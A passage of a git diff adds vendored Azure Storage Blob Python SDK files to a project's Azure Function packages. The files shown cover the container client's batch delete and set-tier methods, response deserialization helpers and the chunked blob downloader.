delete_snapshots is not None: + header_parameters['x-ms-delete-snapshots'] = self._client._serialize.header( # pylint: disable=protected-access + "delete_snapshots", delete_snapshots, 'DeleteSnapshotsOptionType') + if lease_id is not None: + header_parameters['x-ms-lease-id'] = self._client._serialize.header( # pylint: disable=protected-access + "lease_id", lease_id, 'str') + if if_modified_since is not None: + header_parameters['If-Modified-Since'] = self._client._serialize.header( # pylint: disable=protected-access + "if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + header_parameters['If-Unmodified-Since'] = self._client._serialize.header( # pylint: disable=protected-access + "if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + header_parameters['If-Match'] = self._client._serialize.header( # pylint: disable=protected-access + "if_match", if_match, 'str') + if if_none_match is not None: + header_parameters['If-None-Match'] = self._client._serialize.header( # pylint: disable=protected-access + "if_none_match", if_none_match, 'str') + if if_tags is not None: + header_parameters['x-ms-if-tags'] = self._client._serialize.header("if_tags", if_tags, 'str') # pylint: disable=protected-access + + return query_parameters, header_parameters + + def _generate_delete_blobs_options(self, + *blobs, # type: List[Union[str, BlobProperties, dict]] + **kwargs + ): + timeout = kwargs.pop('timeout', None) + raise_on_any_failure = kwargs.pop('raise_on_any_failure', True) + delete_snapshots = kwargs.pop('delete_snapshots', None) + if_modified_since = kwargs.pop('if_modified_since', None) + if_unmodified_since = kwargs.pop('if_unmodified_since', None) + if_tags_match_condition = kwargs.pop('if_tags_match_condition', None) + kwargs.update({'raise_on_any_failure': raise_on_any_failure, + 'sas': self._query_str.replace('?', '&'), + 'timeout': '&timeout=' + str(timeout) if timeout else "", + 'path': self.container_name, + 'restype': 'restype=container&' + }) + + reqs = [] + for blob in blobs: + blob_name = _get_blob_name(blob) + container_name = self.container_name + + try: + options = BlobClient._generic_delete_blob_options( # pylint: disable=protected-access + snapshot=blob.get('snapshot'), + delete_snapshots=delete_snapshots or blob.get('delete_snapshots'), + lease=blob.get('lease_id'), + if_modified_since=if_modified_since or blob.get('if_modified_since'), + if_unmodified_since=if_unmodified_since or blob.get('if_unmodified_since'), + etag=blob.get('etag'), + if_tags_match_condition=if_tags_match_condition or blob.get('if_tags_match_condition'), + match_condition=blob.get('match_condition') or MatchConditions.IfNotModified if blob.get('etag') + else None, + timeout=blob.get('timeout'), + ) + except AttributeError: + options = BlobClient._generic_delete_blob_options( # pylint: disable=protected-access + delete_snapshots=delete_snapshots, + if_modified_since=if_modified_since, + if_unmodified_since=if_unmodified_since, + if_tags_match_condition=if_tags_match_condition + ) + + query_parameters, header_parameters = self._generate_delete_blobs_subrequest_options(**options) + + req = HttpRequest( + "DELETE", + "/{}/{}{}".format(quote(container_name), quote(blob_name, safe='/~'), self._query_str), + headers=header_parameters + ) + req.format_parameters(query_parameters) + reqs.append(req) + + return reqs, kwargs + + @distributed_trace + def delete_blobs(self, *blobs, **kwargs): + # type: (...) -> Iterator[HttpResponse] + """Marks the specified blobs or snapshots for deletion. + + The blobs are later deleted during garbage collection. + Note that in order to delete blobs, you must delete all of their + snapshots. You can delete both at the same time with the delete_blobs operation. + + If a delete retention policy is enabled for the service, then this operation soft deletes the blobs or snapshots + and retains the blobs or snapshots for specified number of days. + After specified number of days, blobs' data is removed from the service during garbage collection. + Soft deleted blobs or snapshots are accessible through :func:`list_blobs()` specifying `include=["deleted"]` + Soft-deleted blobs or snapshots can be restored using :func:`~BlobClient.undelete()` + + The maximum number of blobs that can be deleted in a single request is 256. + + :param blobs: + The blobs to delete. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys, value rules. + + blob name: + key: 'name', value type: str + snapshot you want to delete: + key: 'snapshot', value type: str + whether to delete snapthots when deleting blob: + key: 'delete_snapshots', value: 'include' or 'only' + if the blob modified or not: + key: 'if_modified_since', 'if_unmodified_since', value type: datetime + etag: + key: 'etag', value type: str + match the etag or not: + key: 'match_condition', value type: MatchConditions + tags match condition: + key: 'if_tags_match_condition', value type: str + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword str delete_snapshots: + Required if a blob has associated snapshots. Values include: + - "only": Deletes only the blobs snapshots. + - "include": Deletes the blob along with all snapshots. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: An iterator of responses, one for each blob in order + :rtype: Iterator[~azure.core.pipeline.transport.HttpResponse] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START delete_multiple_blobs] + :end-before: [END delete_multiple_blobs] + :language: python + :dedent: 8 + :caption: Deleting multiple blobs. + """ + if len(blobs) == 0: + return iter(list()) + + reqs, options = self._generate_delete_blobs_options(*blobs, **kwargs) + + return self._batch_send(*reqs, **options) + + def _generate_set_tiers_subrequest_options( + self, tier, snapshot=None, version_id=None, rehydrate_priority=None, lease_access_conditions=None, **kwargs + ): + """This code is a copy from _generated. + + Once Autorest is able to provide request preparation this code should be removed. + """ + if not tier: + raise ValueError("A blob tier must be specified") + if snapshot and version_id: + raise ValueError("Snapshot and version_id cannot be set at the same time") + if_tags = kwargs.pop('if_tags', None) + + lease_id = None + if lease_access_conditions is not None: + lease_id = lease_access_conditions.lease_id + + comp = "tier" + timeout = kwargs.pop('timeout', None) + # Construct parameters + query_parameters = {} + if snapshot is not None: + query_parameters['snapshot'] = self._client._serialize.query("snapshot", snapshot, 'str') # pylint: disable=protected-access + if version_id is not None: + query_parameters['versionid'] = self._client._serialize.query("version_id", version_id, 'str') # pylint: disable=protected-access + if timeout is not None: + query_parameters['timeout'] = self._client._serialize.query("timeout", timeout, 'int', minimum=0) # pylint: disable=protected-access + query_parameters['comp'] = self._client._serialize.query("comp", comp, 'str') # pylint: disable=protected-access, specify-parameter-names-in-call + + # Construct headers + header_parameters = {} + header_parameters['x-ms-access-tier'] = self._client._serialize.header("tier", tier, 'str') # pylint: disable=protected-access, specify-parameter-names-in-call + if rehydrate_priority is not None: + header_parameters['x-ms-rehydrate-priority'] = self._client._serialize.header( # pylint: disable=protected-access + "rehydrate_priority", rehydrate_priority, 'str') + if lease_id is not None: + header_parameters['x-ms-lease-id'] = self._client._serialize.header("lease_id", lease_id, 'str') # pylint: disable=protected-access + if if_tags is not None: + header_parameters['x-ms-if-tags'] = self._client._serialize.header("if_tags", if_tags, 'str') # pylint: disable=protected-access + + return query_parameters, header_parameters + + def _generate_set_tiers_options(self, + blob_tier, # type: Optional[Union[str, StandardBlobTier, PremiumPageBlobTier]] + *blobs, # type: List[Union[str, BlobProperties, dict]] + **kwargs + ): + timeout = kwargs.pop('timeout', None) + raise_on_any_failure = kwargs.pop('raise_on_any_failure', True) + rehydrate_priority = kwargs.pop('rehydrate_priority', None) + if_tags = kwargs.pop('if_tags_match_condition', None) + kwargs.update({'raise_on_any_failure': raise_on_any_failure, + 'sas': self._query_str.replace('?', '&'), + 'timeout': '&timeout=' + str(timeout) if timeout else "", + 'path': self.container_name, + 'restype': 'restype=container&' + }) + + reqs = [] + for blob in blobs: + blob_name = _get_blob_name(blob) + container_name = self.container_name + + try: + tier = blob_tier or blob.get('blob_tier') + query_parameters, header_parameters = self._generate_set_tiers_subrequest_options( + tier=tier, + snapshot=blob.get('snapshot'), + version_id=blob.get('version_id'), + rehydrate_priority=rehydrate_priority or blob.get('rehydrate_priority'), + lease_access_conditions=blob.get('lease_id'), + if_tags=if_tags or blob.get('if_tags_match_condition'), + timeout=timeout or blob.get('timeout') + ) + except AttributeError: + query_parameters, header_parameters = self._generate_set_tiers_subrequest_options( + blob_tier, rehydrate_priority=rehydrate_priority, if_tags=if_tags) + + req = HttpRequest( + "PUT", + "/{}/{}{}".format(quote(container_name), quote(blob_name, safe='/~'), self._query_str), + headers=header_parameters + ) + req.format_parameters(query_parameters) + reqs.append(req) + + return reqs, kwargs + + @distributed_trace + def set_standard_blob_tier_blobs( + self, + standard_blob_tier, # type: Optional[Union[str, StandardBlobTier]] + *blobs, # type: List[Union[str, BlobProperties, dict]] + **kwargs + ): + # type: (...) -> Iterator[HttpResponse] + """This operation sets the tier on block blobs. + + A block blob's tier determines Hot/Cool/Archive storage type. + This operation does not update the blob's ETag. + + The maximum number of blobs that can be updated in a single request is 256. + + :param standard_blob_tier: + Indicates the tier to be set on all blobs. Options include 'Hot', 'Cool', + 'Archive'. The hot tier is optimized for storing data that is accessed + frequently. The cool storage tier is optimized for storing data that + is infrequently accessed and stored for at least a month. The archive + tier is optimized for storing data that is rarely accessed and stored + for at least six months with flexible latency requirements. + + .. note:: + If you want to set different tier on different blobs please set this positional parameter to None. + Then the blob tier on every BlobProperties will be taken. + + :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier + :param blobs: + The blobs with which to interact. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys, value rules. + + blob name: + key: 'name', value type: str + standard blob tier: + key: 'blob_tier', value type: StandardBlobTier + rehydrate priority: + key: 'rehydrate_priority', value type: RehydratePriority + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + snapshot: + key: "snapshost", value type: str + version id: + key: "version_id", value type: str + tags match condition: + key: 'if_tags_match_condition', value type: str + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. + :return: An iterator of responses, one for each blob in order + :rtype: Iterator[~azure.core.pipeline.transport.HttpResponse] + """ + reqs, options = self._generate_set_tiers_options(standard_blob_tier, *blobs, **kwargs) + + return self._batch_send(*reqs, **options) + + @distributed_trace + def set_premium_page_blob_tier_blobs( + self, + premium_page_blob_tier, # type: Optional[Union[str, PremiumPageBlobTier]] + *blobs, # type: List[Union[str, BlobProperties, dict]] + **kwargs + ): + # type: (...) -> Iterator[HttpResponse] + """Sets the page blob tiers on all blobs. This API is only supported for page blobs on premium accounts. + + The maximum number of blobs that can be updated in a single request is 256. + + :param premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + + .. note:: + If you want to set different tier on different blobs please set this positional parameter to None. + Then the blob tier on every BlobProperties will be taken. + + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :param blobs: + The blobs with which to interact. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys, value rules. + + blob name: + key: 'name', value type: str + premium blob tier: + key: 'blob_tier', value type: PremiumPageBlobTier + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. + :return: An iterator of responses, one for each blob in order + :rtype: iterator[~azure.core.pipeline.transport.HttpResponse] + """ + reqs, options = self._generate_set_tiers_options(premium_page_blob_tier, *blobs, **kwargs) + + return self._batch_send(*reqs, **options) + + def get_blob_client( + self, blob, # type: Union[str, BlobProperties] + snapshot=None # type: str + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. + + :param blob: + The blob with which to interact. + :type blob: str or ~azure.storage.blob.BlobProperties + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`~BlobClient.create_snapshot()`. + :returns: A BlobClient. + :rtype: ~azure.storage.blob.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START get_blob_client] + :end-before: [END get_blob_client] + :language: python + :dedent: 8 + :caption: Get the blob client. + """ + blob_name = _get_blob_name(blob) + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( + self.url, container_name=self.container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_deserialize.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_deserialize.py new file mode 100644 index 0000000..fbb5e77 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_deserialize.py @@ -0,0 +1,174 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use +from typing import ( # pylint: disable=unused-import + Tuple, Dict, List, + TYPE_CHECKING +) +try: + from urllib.parse import unquote +except ImportError: + from urllib import unquote +from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy +from ._shared.models import get_enum_value +from ._shared.response_handlers import deserialize_metadata +from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \ + StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule + +if TYPE_CHECKING: + from ._generated.models import PageList + + +def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers): + try: + deserialized_response = response.http_response + except AttributeError: + deserialized_response = response + return cls_method(deserialized_response, obj, headers) + + +def deserialize_blob_properties(response, obj, headers): + blob_properties = BlobProperties( + metadata=deserialize_metadata(response, obj, headers), + object_replication_source_properties=deserialize_ors_policies(response.http_response.headers), + **headers + ) + if 'Content-Range' in headers: + if 'x-ms-blob-content-md5' in headers: + blob_properties.content_settings.content_md5 = headers['x-ms-blob-content-md5'] + else: + blob_properties.content_settings.content_md5 = None + return blob_properties + + +def deserialize_ors_policies(policy_dictionary): + + if policy_dictionary is None: + return None + # For source blobs (blobs that have policy ids and rule ids applied to them), + # the header will be formatted as "x-ms-or-_: {Complete, Failed}". + # The value of this header is the status of the replication. + or_policy_status_headers = {key: val for key, val in policy_dictionary.items() + if 'or-' in key and key != 'x-ms-or-policy-id'} + + parsed_result = {} + + for key, val in or_policy_status_headers.items(): + # list blobs gives or-policy_rule and get blob properties gives x-ms-or-policy_rule + policy_and_rule_ids = key.split('or-')[1].split('_') + policy_id = policy_and_rule_ids[0] + rule_id = policy_and_rule_ids[1] + + # If we are seeing this policy for the first time, create a new list to store rule_id -> result + parsed_result[policy_id] = parsed_result.get(policy_id) or list() + parsed_result[policy_id].append(ObjectReplicationRule(rule_id=rule_id, status=val)) + + result_list = [ObjectReplicationPolicy(policy_id=k, rules=v) for k, v in parsed_result.items()] + + return result_list + + +def deserialize_blob_stream(response, obj, headers): + blob_properties = deserialize_blob_properties(response, obj, headers) + obj.properties = blob_properties + return response.http_response.location_mode, obj + + +def deserialize_container_properties(response, obj, headers): + metadata = deserialize_metadata(response, obj, headers) + container_properties = ContainerProperties( + metadata=metadata, + **headers + ) + return container_properties + + +def get_page_ranges_result(ranges): + # type: (PageList) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + page_range = [] # type: ignore + clear_range = [] # type: List + if ranges.page_range: + page_range = [{'start': b.start, 'end': b.end} for b in ranges.page_range] # type: ignore + if ranges.clear_range: + clear_range = [{'start': b.start, 'end': b.end} for b in ranges.clear_range] + return page_range, clear_range # type: ignore + + +def service_stats_deserialize(generated): + """Deserialize a ServiceStats objects into a dict. + """ + return { + 'geo_replication': { + 'status': generated.geo_replication.status, + 'last_sync_time': generated.geo_replication.last_sync_time, + } + } + + +def service_properties_deserialize(generated): + """Deserialize a ServiceProperties objects into a dict. + """ + return { + 'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging), # pylint: disable=protected-access + 'hour_metrics': Metrics._from_generated(generated.hour_metrics), # pylint: disable=protected-access + 'minute_metrics': Metrics._from_generated(generated.minute_metrics), # pylint: disable=protected-access + 'cors': [CorsRule._from_generated(cors) for cors in generated.cors], # pylint: disable=protected-access + 'target_version': generated.default_service_version, # pylint: disable=protected-access + 'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy), # pylint: disable=protected-access + 'static_website': StaticWebsite._from_generated(generated.static_website), # pylint: disable=protected-access + } + + +def get_blob_properties_from_generated_code(generated): + blob = BlobProperties() + if generated.name.encoded: + blob.name = unquote(generated.name.content) + else: + blob.name = generated.name.content + blob_type = get_enum_value(generated.properties.blob_type) + blob.blob_type = BlobType(blob_type) if blob_type else None + blob.etag = generated.properties.etag + blob.deleted = generated.deleted + blob.snapshot = generated.snapshot + blob.is_append_blob_sealed = generated.properties.is_sealed + blob.metadata = generated.metadata.additional_properties if generated.metadata else {} + blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None + blob.lease = LeaseProperties._from_generated(generated) # pylint: disable=protected-access + blob.copy = CopyProperties._from_generated(generated) # pylint: disable=protected-access + blob.last_modified = generated.properties.last_modified + blob.creation_time = generated.properties.creation_time + blob.content_settings = ContentSettings._from_generated(generated) # pylint: disable=protected-access + blob.size = generated.properties.content_length + blob.page_blob_sequence_number = generated.properties.blob_sequence_number + blob.server_encrypted = generated.properties.server_encrypted + blob.encryption_scope = generated.properties.encryption_scope + blob.deleted_time = generated.properties.deleted_time + blob.remaining_retention_days = generated.properties.remaining_retention_days + blob.blob_tier = generated.properties.access_tier + blob.rehydrate_priority = generated.properties.rehydrate_priority + blob.blob_tier_inferred = generated.properties.access_tier_inferred + blob.archive_status = generated.properties.archive_status + blob.blob_tier_change_time = generated.properties.access_tier_change_time + blob.version_id = generated.version_id + blob.is_current_version = generated.is_current_version + blob.tag_count = generated.properties.tag_count + blob.tags = parse_tags(generated.blob_tags) # pylint: disable=protected-access + blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata) + blob.last_accessed_on = generated.properties.last_accessed_on + blob.immutability_policy = ImmutabilityPolicy._from_generated(generated) # pylint: disable=protected-access + blob.has_legal_hold = generated.properties.legal_hold + blob.has_versions_only = generated.has_versions_only + return blob + + +def parse_tags(generated_tags): + # type: (Optional[List[BlobTag]]) -> Union[Dict[str, str], None] + """Deserialize a list of BlobTag objects into a dict. + """ + if generated_tags: + tag_dict = {t.key: t.value for t in generated_tags.blob_tag_set} + return tag_dict + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_download.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_download.py new file mode 100644 index 0000000..04a5a86 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_download.py @@ -0,0 +1,646 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import sys +import threading +import time + +import warnings +from io import BytesIO +from typing import Iterator, Union + +import requests +from azure.core.exceptions import HttpResponseError, ServiceResponseError + +from azure.core.tracing.common import with_current_context +from ._shared.encryption import decrypt_blob +from ._shared.request_handlers import validate_and_format_range_headers +from ._shared.response_handlers import process_storage_error, parse_length_from_content_range +from ._deserialize import get_page_ranges_result + + +def process_range_and_offset(start_range, end_range, length, encryption): + start_offset, end_offset = 0, 0 + if encryption.get("key") is not None or encryption.get("resolver") is not None: + if start_range is not None: + # Align the start of the range along a 16 byte block + start_offset = start_range % 16 + start_range -= start_offset + + # Include an extra 16 bytes for the IV if necessary + # Because of the previous offsetting, start_range will always + # be a multiple of 16. + if start_range > 0: + start_offset += 16 + start_range -= 16 + + if length is not None: + # Align the end of the range along a 16 byte block + end_offset = 15 - (end_range % 16) + end_range += end_offset + + return (start_range, end_range), (start_offset, end_offset) + + +def process_content(data, start_offset, end_offset, encryption): + if data is None: + raise ValueError("Response cannot be None.") + + content = b"".join(list(data)) + + if content and encryption.get("key") is not None or encryption.get("resolver") is not None: + try: + return decrypt_blob( + encryption.get("required"), + encryption.get("key"), + encryption.get("resolver"), + content, + start_offset, + end_offset, + data.response.headers, + ) + except Exception as error: + raise HttpResponseError(message="Decryption failed.", response=data.response, error=error) + return content + + +class _ChunkDownloader(object): # pylint: disable=too-many-instance-attributes + def __init__( + self, + client=None, + non_empty_ranges=None, + total_size=None, + chunk_size=None, + current_progress=None, + start_range=None, + end_range=None, + stream=None, + parallel=None, + validate_content=None, + encryption_options=None, + progress_hook=None, + **kwargs + ): + self.client = client + self.non_empty_ranges = non_empty_ranges + + # Information on the download range/chunk size + self.chunk_size = chunk_size + self.total_size = total_size + self.start_index = start_range + self.end_index = end_range + + # The destination that we will write to + self.stream = stream + self.stream_lock = threading.Lock() if parallel else None + self.progress_lock = threading.Lock() if parallel else None + self.progress_hook = progress_hook + + # For a parallel download, the stream is always seekable, so we note down the current position + # in order to seek to the right place when out-of-order chunks come in + self.stream_start = stream.tell() if parallel else None + + # Download progress so far + self.progress_total = current_progress + + # Encryption + self.encryption_options = encryption_options + + # Parameters for each get operation + self.validate_content = validate_content + self.request_options = kwargs + + def _calculate_range(self, chunk_start): + if chunk_start + self.chunk_size > self.end_index: + chunk_end = self.end_index + else: + chunk_end = chunk_start + self.chunk_size + return chunk_start, chunk_end + + def get_chunk_offsets(self): + index = self.start_index + while index < self.end_index: + yield index + index += self.chunk_size + + def process_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + chunk_data = self._download_chunk(chunk_start, chunk_end - 1) + length = chunk_end - chunk_start + if length > 0: + self._write_to_stream(chunk_data, chunk_start) + self._update_progress(length) + + def yield_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + return self._download_chunk(chunk_start, chunk_end - 1) + + def _update_progress(self, length): + if self.progress_lock: + with self.progress_lock: # pylint: disable=not-context-manager + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + self.progress_hook(self.progress_total, self.total_size) + + def _write_to_stream(self, chunk_data, chunk_start): + if self.stream_lock: + with self.stream_lock: # pylint: disable=not-context-manager + self.stream.seek(self.stream_start + (chunk_start - self.start_index)) + self.stream.write(chunk_data) + else: + self.stream.write(chunk_data) + + def _do_optimize(self, given_range_start, given_range_end): + # If we have no page range list stored, then assume there's data everywhere for that page blob + # or it's a block blob or append blob + if self.non_empty_ranges is None: + return False + + for source_range in self.non_empty_ranges: + # Case 1: As the range list is sorted, if we've reached such a source_range + # we've checked all the appropriate source_range already and haven't found any overlapping. + # so the given range doesn't have any data and download optimization could be applied. + # given range: | | + # source range: | | + if given_range_end < source_range['start']: # pylint:disable=no-else-return + return True + # Case 2: the given range comes after source_range, continue checking. + # given range: | | + # source range: | | + elif source_range['end'] < given_range_start: + pass + # Case 3: source_range and given range overlap somehow, no need to optimize. + else: + return False + # Went through all src_ranges, but nothing overlapped. Optimization will be applied. + return True + + def _download_chunk(self, chunk_start, chunk_end): + download_range, offset = process_range_and_offset( + chunk_start, chunk_end, chunk_end, self.encryption_options + ) + + # No need to download the empty chunk from server if there's no data in the chunk to be downloaded. + # Do optimize and create empty chunk locally if condition is met. + if self._do_optimize(download_range[0], download_range[1]): + chunk_data = b"\x00" * self.chunk_size + else: + range_header, range_validation = validate_and_format_range_headers( + download_range[0], + download_range[1], + check_content_md5=self.validate_content + ) + + retry_active = True + retry_total = 3 + while retry_active: + try: + _, response = self.client.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self.validate_content, + data_stream_total=self.total_size, + download_stream_current=self.progress_total, + **self.request_options + ) + except HttpResponseError as error: + process_storage_error(error) + + try: + chunk_data = process_content(response, offset[0], offset[1], self.encryption_options) + retry_active = False + except (requests.exceptions.ChunkedEncodingError, requests.exceptions.ConnectionError) as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + time.sleep(1) + + # This makes sure that if_match is set so that we can validate + # that subsequent downloads are to an unmodified blob + if self.request_options.get("modified_access_conditions"): + self.request_options["modified_access_conditions"].if_match = response.properties.etag + + return chunk_data + + +class _ChunkIterator(object): + """Async iterator for chunks in blob download stream.""" + + def __init__(self, size, content, downloader, chunk_size): + self.size = size + self._chunk_size = chunk_size + self._current_content = content + self._iter_downloader = downloader + self._iter_chunks = None + self._complete = (size == 0) + + def __len__(self): + return self.size + + def __iter__(self): + return self + + def __next__(self): + """Iterate through responses.""" + if self._complete: + raise StopIteration("Download complete") + if not self._iter_downloader: + # cut the data obtained from initial GET into chunks + if len(self._current_content) > self._chunk_size: + return self._get_chunk_data() + self._complete = True + return self._current_content + + if not self._iter_chunks: + self._iter_chunks = self._iter_downloader.get_chunk_offsets() + + # initial GET result still has more than _chunk_size bytes of data + if len(self._current_content) >= self._chunk_size: + return self._get_chunk_data() + + try: + chunk = next(self._iter_chunks) + self._current_content += self._iter_downloader.yield_chunk(chunk) + except StopIteration as e: + self._complete = True + if self._current_content: + return self._current_content + raise e + + # the current content from the first get is still there but smaller than chunk size + # therefore we want to make sure its also included + return self._get_chunk_data() + + next = __next__ # Python 2 compatibility. + + def _get_chunk_data(self): + chunk_data = self._current_content[: self._chunk_size] + self._current_content = self._current_content[self._chunk_size:] + return chunk_data + + +class StorageStreamDownloader(object): # pylint: disable=too-many-instance-attributes + """A streaming object to download from Azure Storage. + + :ivar str name: + The name of the blob being downloaded. + :ivar str container: + The name of the container where the blob is. + :ivar ~azure.storage.blob.BlobProperties properties: + The properties of the blob being downloaded. If only a range of the data is being + downloaded, this will be reflected in the properties. + :ivar int size: + The size of the total data in the stream. This will be the byte range if specified, + otherwise the total size of the blob. + """ + + def __init__( + self, + clients=None, + config=None, + start_range=None, + end_range=None, + validate_content=None, + encryption_options=None, + max_concurrency=1, + name=None, + container=None, + encoding=None, + **kwargs + ): + self.name = name + self.container = container + self.properties = None + self.size = None + + self._clients = clients + self._config = config + self._start_range = start_range + self._end_range = end_range + self._max_concurrency = max_concurrency + self._encoding = encoding + self._validate_content = validate_content + self._encryption_options = encryption_options or {} + self._progress_hook = kwargs.pop('progress_hook', None) + self._request_options = kwargs + self._location_mode = None + self._download_complete = False + self._current_content = None + self._file_size = None + self._non_empty_ranges = None + self._response = None + + # The service only provides transactional MD5s for chunks under 4MB. + # If validate_content is on, get only self.MAX_CHUNK_GET_SIZE for the first + # chunk so a transactional MD5 can be retrieved. + self._first_get_size = ( + self._config.max_single_get_size if not self._validate_content else self._config.max_chunk_get_size + ) + initial_request_start = self._start_range if self._start_range is not None else 0 + if self._end_range is not None and self._end_range - self._start_range < self._first_get_size: + initial_request_end = self._end_range + else: + initial_request_end = initial_request_start + self._first_get_size - 1 + + self._initial_range, self._initial_offset = process_range_and_offset( + initial_request_start, initial_request_end, self._end_range, self._encryption_options + ) + + self._response = self._initial_request() + self.properties = self._response.properties + self.properties.name = self.name + self.properties.container = self.container + + # Set the content length to the download size instead of the size of + # the last range + self.properties.size = self.size + + # Overwrite the content range to the user requested range + self.properties.content_range = "bytes {0}-{1}/{2}".format( + self._start_range, + self._end_range, + self._file_size + ) + + # Overwrite the content MD5 as it is the MD5 for the last range instead + # of the stored MD5 + # TODO: Set to the stored MD5 when the service returns this + self.properties.content_md5 = None + + def __len__(self): + return self.size + + def _initial_request(self): + range_header, range_validation = validate_and_format_range_headers( + self._initial_range[0], + self._initial_range[1], + start_range_required=False, + end_range_required=False, + check_content_md5=self._validate_content + ) + + retry_active = True + retry_total = 3 + while retry_active: + try: + location_mode, response = self._clients.blob.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self._validate_content, + data_stream_total=None, + download_stream_current=0, + **self._request_options + ) + + # Check the location we read from to ensure we use the same one + # for subsequent requests. + self._location_mode = location_mode + + # Parse the total file size and adjust the download size if ranges + # were specified + self._file_size = parse_length_from_content_range(response.properties.content_range) + if self._end_range is not None: + # Use the end range index unless it is over the end of the file + self.size = min(self._file_size, self._end_range - self._start_range + 1) + elif self._start_range is not None: + self.size = self._file_size - self._start_range + else: + self.size = self._file_size + + except HttpResponseError as error: + if self._start_range is None and error.response.status_code == 416: + # Get range will fail on an empty file. If the user did not + # request a range, do a regular get request in order to get + # any properties. + try: + _, response = self._clients.blob.download( + validate_content=self._validate_content, + data_stream_total=0, + download_stream_current=0, + **self._request_options + ) + except HttpResponseError as error: + process_storage_error(error) + + # Set the download size to empty + self.size 